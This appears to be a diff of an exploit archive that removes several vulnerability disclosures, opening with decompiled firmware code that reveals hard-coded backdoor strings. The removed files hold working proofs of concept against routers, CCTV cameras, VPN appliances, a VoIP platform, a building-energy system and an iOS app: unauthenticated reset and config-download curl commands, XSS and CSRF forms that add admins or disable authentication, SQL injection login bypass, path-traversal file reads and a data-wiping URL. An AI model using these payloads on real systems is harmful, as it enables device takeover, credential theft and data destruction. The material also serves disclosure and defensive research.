return;
...
Another 2 backdoors exist using the websCheckCookie() and specific header strings.
...
iVar2 = strncmp(acStack2268,"UPGRADE:927",0xb);
if (iVar2 != 0) {
return 0xffffffff;
}
if ((*(char **)(iParm1 + 0xdc) != (char *)0x0) &&
(iVar2 = strncmp(*(char **)(iParm1 + 0xdc),"TONY@KZT",8), iVar2 != 0)) {
return 0xffffffff;
...
if (iVar1 != 0) goto LAB_0047c304;
LAB_0047c32c:
WebsDbgLog(2,"[%s] UserAgent=%s, username=%s,command=%s","startSysCmd",__s1_00,__s1_01,__s1);
LAB_0047c35c:
__n = strlen(__s1);
if (__n == 0) {
snprintf(acStack1560,0x200,"cat /dev/null > %s","/var/system_command.log");
WebsDbgLog(3,"[%s] %s","startSysCmd",acStack1560);
system(acStack1560);
websWrite(iParm1,"invalid command!");
goto LAB_0047c3f8;
}
...
Bypass the backdoor password request and enable debug mode from within the web console:
$('#div_check').modal('hide'); <--- syscmd.html
g_password_check_alert.close(); <--- syscmd.asp

72
exploits/hardware/webapps/49684.txt
View file

@ -1,72 +0,0 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The device allows unauthenticated attackers to visit the
unprotected /goform/LoadDefaultSettings endpoint and reset the
device to its factory default settings. Once the GET request is
made, the device will reboot with its default settings allowing
the attacker to bypass authentication and take full control of
the system.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5642
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5642.php
03.02.2021
--
$ curl -sk https://192.168.1.1/goform/LoadDefaultSettings
success
$

70
exploits/hardware/webapps/49686.txt
View file

@ -1,70 +0,0 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: JT3500V is vulnerable to unauthenticated configuration disclosure
when direct object reference is made to the export_settings.cgi file
using an HTTP GET request. This will enable the attacker to disclose
sensitive information and help her in authentication bypass, privilege
escalation and full system access.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5644
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5644.php
03.02.2021
--
$ curl -sk -O https://192.168.1.1/cgi-bin/export_settings.cgi; ls -alsth config.dat
8.0K -rw-rw-r-- 1 teppei teppei 5.5K Feb 4 11:31 config.dat

112
exploits/hardware/webapps/49800.html
View file

@ -1,112 +0,0 @@
# Exploit Title: Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS)
# Date: 13.04.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.sipwise.com
Sipwise C5 NGCP CSC Multiple Stored/Reflected XSS Vulnerabilities
Vendor: Sipwise GmbH
Product web page: https://www.sipwise.com
Affected version: <=CE_m39.3.1
NGCP www_admin version 3.6.7
Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform)
is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide
rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail,
conferencing etc.) that can be configured by end users in the self-care web interface.
For operators, it offers a web-based administrative panel that allows them to configure
subscribers, SIP peerings, billing profiles, and other entities. The administrative web
panel also shows the real-time statistics for the whole system. For tight integration
into existing infrastructures, Sipwise C5 provides a powerful REST API interface.
Desc: Sipwise software platform suffers from multiple authenticated stored and reflected
cross-site scripting vulnerabilities when input passed via several parameters to several
scripts is not properly sanitized before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in context of an
affected site.
Tested on: Apache/2.2.22 (Debian)
Apache/2.2.16 (Debian)
nginx
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5648
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5648.php
13.04.2021
--
Stored XSS (POST tsetname):
---------------------------
<html>
<body>
<form action="https://10.0.1.7/callforward/time/set/save" method="POST">
<input type="hidden" name="tsetname" value=""><script>confirm&#40;251&#41;<&#47;script>" />
<input type="hidden" name="subscriber&#95;id" value="401" />
<input type="hidden" name="x" value="90027" />
<input type="hidden" name="y" value="&#45;1" />
<input type="submit" value="Go for callforward" />
</form>
</body>
</html>
Reflected XSS (GET filter):
---------------------------
<html>
<body>
<form action="https://10.0.1.7/addressbook" method="GET">
<input type="hidden" name="filter" value='"><script>confirm(251)</script>' />
<input type="hidden" name="x" value="0" />
<input type="hidden" name="y" value="0" />
<input type="submit" value="Go for addressbook" />
</form>
</body>
</html>
Stored XSS (POST firstname, lastname, company):
-----------------------------------------------
<html>
<body>
<form action="https://10.0.1.7/addressbook/save" method="POST">
<input type="hidden" name="firstname" value='"><script>alert(251)</script>' />
<input type="hidden" name="lastname" value='"><script>alert(251)</script>' />
<input type="hidden" name="company" value='"><script>alert(251)</script>' />
<input type="hidden" name="homephonenumber" value="1112223333" />
<input type="hidden" name="phonenumber" value="3332221111" />
<input type="hidden" name="mobilenumber" value="" />
<input type="hidden" name="faxnumber" value="" />
<input type="hidden" name="email" value="lab%40zeroscience.mk" />
<input type="hidden" name="homepage" value="" />
<input type="hidden" name="id" value="" />
<input type="hidden" name="x" value="89957" />
<input type="hidden" name="y" value="21" />
<input type="submit" value="Go for addressbook 2" />
</form>
</body>
</html>
Reflected XSS (GET lang):
-------------------------
<html>
<body>
<form action="https://10.0.1.7/statistics/versions" method="GET">
<input type="hidden" name="lang" value="en'-alert(251)-'ZSL" />
<input type="submit" value="Go for statistics" />
</form>
</body>
</html>

62
exploits/hardware/webapps/50146.txt
View file

@ -1,62 +0,0 @@
# Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass
# Date: 05.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kevinlab.com
Vendor: KevinLAB Inc.
Product web page: http://www.kevinlab.com
Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)
Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy
management platform. KevinLAB's BEMS (Building Energy Management System) enables
efficient energy management in buildings. It improves the efficient of energy use
by collecting and analyzing various information of energy usage and facilities in
the building. It also manages energy usage, facility efficiency and indoor environment
control.
Desc: The application suffers from an unauthenticated SQL Injection vulnerability.
Input passed through 'input_id' POST parameter in '/http/index.php' is not properly
sanitised before being returned to the user or used in SQL queries. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication
mechanism.
Tested on: Linux CentOS 7
Apache 2.4.6
Python 2.7.5
PHP 5.4.16
MariaDB 5.5.68
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5655
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php
05.07.2021
--
PoC POST data payload (extract):
--------------------------------
POST /http/index.php HTTP/1.1
Host: 192.168.1.3
requester=login
request=login
params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
PoC POST data payload (authbypass):
-----------------------------------
POST /http/index.php HTTP/1.1
Host: 192.168.1.3
requester=login
request=login
params=[{"name":"input_id","value":"USERNAME' or 1=1--},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]

79
exploits/hardware/webapps/50172.txt
View file

@ -1,79 +0,0 @@
# Exploit Title: Panasonic Sanyo CCTV Network Camera 2.03-0x - 'Disable Authentication / Change Password' CSRF
# Date: 13.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.panasonic.com
<!--
Panasonic Sanyo CCTV Network Camera 2.03-0x CSRF Disable Authentication / Change Password
Vendor: Panasonic Corporation | SANYO Electric Co., Ltd.
Product web page: https://www.panasonic.com
https://www.sanyo-av.com
https://panasonic.net/sanyo/cs/index.html
Affected version: Model: VCC-HD5600P, FrmVer: 2.03-06 (110315-00), SubVer: 1.01-00 (100528-00)
Model: VDC-HD3300P, FrmVer: 2.03-08 (111222-00), SubVer: 1.01-00 (100528-00)
Model: VDC-HD3300P, FrmVer: 1.02-05 (101005-07), SubVer: 1.01-00 (100528-00)
Model: VCC-HD3300, FrmVer: 2.03-02 (110318-00A), SubVer: 1.01-00 (100528-00)
Model: VDC-HD3100P, FrmVer: 2.03-00 (110204-02), SubVer: 1.01-00 (100528-00)
Model: VCC-HD2100P, FrmVer: 2.03-02 (110318-00A), SubVer: 1.01-00 (100528-00)
Summary: SANYO network camera and network optional board with the
latest H.264 compression technology provide the optimum surveillance
applications with high quality real time moving image at low bandwidth.
Simultaneous stream of H.264 and JPEG data and also COAX video out
to provide flexible solution for digital and analogue combined system.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. These actions can be exploited to perform authentication
detriment and account password change with administrative privileges if
a logged-in user visits a malicious web site.
Tested on: Embedded Linux
CGI
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5659
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5659.php
13.07.2021
-->
[CSRF]
[Anonymous user log in = ON]
orororororororororororororor
[Change admin password]
<html>
<body>
<form action="http://10.0.0.3:82/cgi-bin/user_registration.cgi" method="POST">
<input type="hidden" name="anonymous_sw" value="1" /> <!--Disable authentication-->
<input type="hidden" name="admin1_pw" value="Ztream0017" /> <!--Change admin password-->
<input type="hidden" name="admin2_pw" value="******" />
<input type="hidden" name="admin3_pw" value="******" />
<input type="hidden" name="operator_pw" value="********" />
<input type="hidden" name="guest_pw" value="*****" />
<input type="submit" value="Push" />
</form>
</body>
</html>
<!--
[Defaults]
admin:admin
admin2:admin2
admin3:admin3
operator:operator
operator2:operator2
guest:guest
-->

37
exploits/hardware/webapps/50211.txt
View file

@ -1,37 +0,0 @@
# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE
# DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM
# Date: 6-16-21 (Vendor Notified)
# Exploit Author: Ken 's1ngular1ty' Pyle
# Vendor Homepage: https://www.geovision.com.tw/cyber_security.php
# Version: <= 5.3.3
# Tested on: Windows 20XX / MULTIPLE
# CVE : https://www.geovision.com.tw/cyber_security.php
GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client side exploitation, including session theft:
Nested Exploitation of the LFI, XSS, HTML / Browser Injection:
GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script><iframe%20src=""> HTTP/1.1
Absolute exploitation of the LFI:
POST /Visitor/bin/WebStrings.srf?obj_name=win.ini
GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini
Additionally, the vendor has issued an ineffective / broken patch (https://www.geovision.com.tw/cyber_security.php) which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor.
ex. obj_name=INJECTEDHTML / XSS
The application fails to properly enforce permissions and sanitize user request. This allows for LFI / Remote Code Execution through several vectors:
ex. /Visitor//%252e(path to target)
These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API:
The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack.
These attacks were disclosed as part of the IOTVillage Presentation:
https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20villages/DEFCON%2029%20IoT%20Village%20-%20Ken%20Pyle%20-%20BLUEMONDAY%20Series%20Exploitation%20and%20Mapping%20of%20Vulnerable%20Devices%20at%20Scale.mp4

16
exploits/hardware/webapps/50250.txt
View file

@ -1,16 +0,0 @@
# Exploit Title: Compro Technology IP Camera - 'killps.cgi' Denial-of-Service (DoS)
# Date: 2021-09-30
# Exploit Author: icekam,xiao13,Rainbow,tfsec
# Software Link: http://www.comprotech.com.hk/
# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
# CVE : CVE-2021-40378
There is a backdoor prefabricated in the device in this path. Accessing the
file through the browser after logging in will cause the device to delete
all data (including the data of the camera itself).
Payload:Visit this page after logging in
/cgi-bin/support/killps.cgi
please refer to:
https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md

108
exploits/hardware/webapps/50338.txt
View file

@ -1,108 +0,0 @@
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com
<!--
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 CSRF Add Admin Exploit
Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP / IPVPN / MPVPN
10.2.2r38
10.2.2r25
10.2.2r10
10.1.2r60p82
10.1.2r60p71
10.1.2r60p65
10.1.2r60p58s1
10.1.2r60p58
10.1.2r60p55
10.1.2r60p45
10.1.2r60p35
10.1.2r60p32
10.1.2r60p13
10.1.2r60p10
9.1.2r185
9.1.2r180p2
9.1.2r165
9.1.2r164p5
9.1.2r164p4
9.1.2r164
9.1.2r161p26
9.1.2r161p20
9.1.2r161p17
9.1.2r161p16
9.1.2r161p12
9.1.2r161p3
9.1.2r161p2
9.1.2r156
9.1.2r150
9.1.2r144
9.1.2r129
7.1.2r39
6.1.2r70p75-m
6.1.2r70p45-m
6.1.2r70p26
5.2.0r34
Summary: FatPipe Networks invented the concept of router-clustering,
which provides the highest level of reliability, redundancy, and speed
of Internet traffic for Business Continuity and communications. FatPipe
WARP achieves fault tolerance for companies by creating an easy method
of combining two or more Internet connections of any kind over multiple
ISPs. FatPipe utilizes all paths when the lines are up and running,
dynamically balancing traffic over the multiple lines, and intelligently
failing over inbound and outbound IP traffic when ISP services and/or
components fail.
FatPipe IPVPN balances load and provides reliability among multiple
managed and CPE based VPNs as well as dedicated private networks. FatPipe
IPVPN can also provide you an easy low-cost migration path from private
line, Frame or Point-to-Point networks. You can aggregate multiple private,
MPLS and public networks without additional equipment at the provider's
site.
FatPipe MPVPN, a patented router clustering device, is an essential part
of Disaster Recovery and Business Continuity Planning for Virtual Private
Network (VPN) connectivity. It makes any VPN up to 900% more secure and
300% times more reliable, redundant and faster. MPVPN can take WANs with
an uptime of 99.5% or less and make them 99.999988% or higher, providing
a virtually infallible WAN. MPVPN dynamically balances load over multiple
lines and ISPs without the need for BGP programming. MPVPN aggregates up
to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
you need to keep your VPN up and running despite failures of service, line,
software, or hardware.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5681
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5681.php
30.05.2016
25.07.2021
-->
<html>
<body>
<form action="https://10.0.0.7/fpui/userServlet?loadType=set&block=userSetRequest" method="POST">
<input type="hidden" name="userList" value='[{"userName":"adminz","privilege":"1","password":"TestPwd17","action":"add","state":false}]' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

397
exploits/ios/webapps/49747.txt
View file

@ -1,397 +0,0 @@
# Exploit Title: Mini Mouse 9.3.0 - Local File inclusion / Path Traversal
# Author: gosh
# Date: 05-04-2021
# Vendor Homepage: http://yodinfo.com
# Software Link: https://apps.apple.com/us/app/mini-mouse-remote-control/id914250948
# Version: 9.3.0
# Tested on: iPhone; iOS 14.4.2
GET /op=get_device_info HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 0
HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1
{
"ret_code": 1,
"ret_msg": "success",
"data": {
"uuid": "7E07125B-61BE-4F12-820C-FA706C445219",
"model": "iPhone",
"sys_name": "iOS",
"sys_version": "14.4.2",
"battery_state": 0,
"battery_level": -1,
"memery_total_size": 2983772160,
"device_name": "mobile",
"user_name": "iPhone",
"pwd": "",
"dir_user": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download",
"dir_doc": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents",
"dir_desktop": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Desktop",
"sys_type": 3
}
}
-------------------------------------------------------------------------------------
POST /op=get_file_list HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 0
HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1
{
"ret_code": 1,
"ret_msg": "success",
"data": {
"list": [{
"path": "//usr",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "usr",
"name_display": "usr",
"file_size": 288,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//bin",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "bin",
"name_display": "bin",
"file_size": 128,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//sbin",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "sbin",
"name_display": "sbin",
"file_size": 544,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//.file",
"is_local": true,
"is_hide": true,
"is_floder": false,
"name": ".file",
"name_display": ".file",
"file_size": 0,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//etc",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "etc",
"name_display": "etc",
"file_size": 11,
"create_time": 1577865.600000,
"update_time": 1577865.600000,
"sys_type": 3
}, {
"path": "//System",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "System",
"name_display": "System",
"file_size": 128,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//var",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "var",
"name_display": "var",
"file_size": 11,
"create_time": 1577865.600000,
"update_time": 1577865.600000,
"sys_type": 3
}, {
"path": "//Library",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Library",
"name_display": "Library",
"file_size": 672,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//private",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "private",
"name_display": "private",
"file_size": 224,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//dev",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "dev",
"name_display": "dev",
"file_size": 1395,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//.ba",
"is_local": true,
"is_hide": true,
"is_floder": true,
"name": ".ba",
"name_display": ".ba",
"file_size": 64,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//.mb",
"is_local": true,
"is_hide": true,
"is_floder": true,
"name": ".mb",
"name_display": ".mb",
"file_size": 64,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//tmp",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "tmp",
"name_display": "tmp",
"file_size": 15,
"create_time": 1577865.600000,
"update_time": 1577865.600000,
"sys_type": 3
}, {
"path": "//Applications",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Applications",
"name_display": "Applications",
"file_size": 3296,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//Developer",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Developer",
"name_display": "Developer",
"file_size": 64,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//cores",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "cores",
"name_display": "cores",
"file_size": 64,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}]
}
}
-------------------------
using the data found:
/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download
POST /op=get_file_list HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 101
{"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/"}
HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1
{
"ret_code": 1,
"ret_msg": "success",
"data": {
"list": [{
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//GDT",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "GDT",
"name_display": "GDT",
"file_size": 96,
"create_time": 1617228.400302,
"update_time": 1617228.400302,
"sys_type": 3
}, {
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//input_photo.jpg",
"is_local": true,
"is_hide": false,
"is_floder": false,
"name": "input_photo.jpg",
"name_display": "input_photo.jpg",
"file_size": 6141491,
"create_time": 1617583.738397,
"update_time": 1617583.738402,
"sys_type": 3
}, {
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Ico",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Ico",
"name_display": "Ico",
"file_size": 64,
"create_time": 1617583.334913,
"update_time": 1617583.334913,
"sys_type": 3
}, {
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Download",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Download",
"name_display": "Download",
"file_size": 64,
"create_time": 1617228.371587,
"update_time": 1617228.371587,
"sys_type": 3
}]
}
}
----------------------------------------------------------------------
GET /file=/etc/passwd HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 4
{}
HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/octet-stream
Content-Range: bytes 0-0/2018
Content-Length : 2018
##
# User Database
#
# This file is the authoritative user database.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false
_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false
_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false
_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false
_ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false
_findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false
_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false
_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false
_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false
_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false
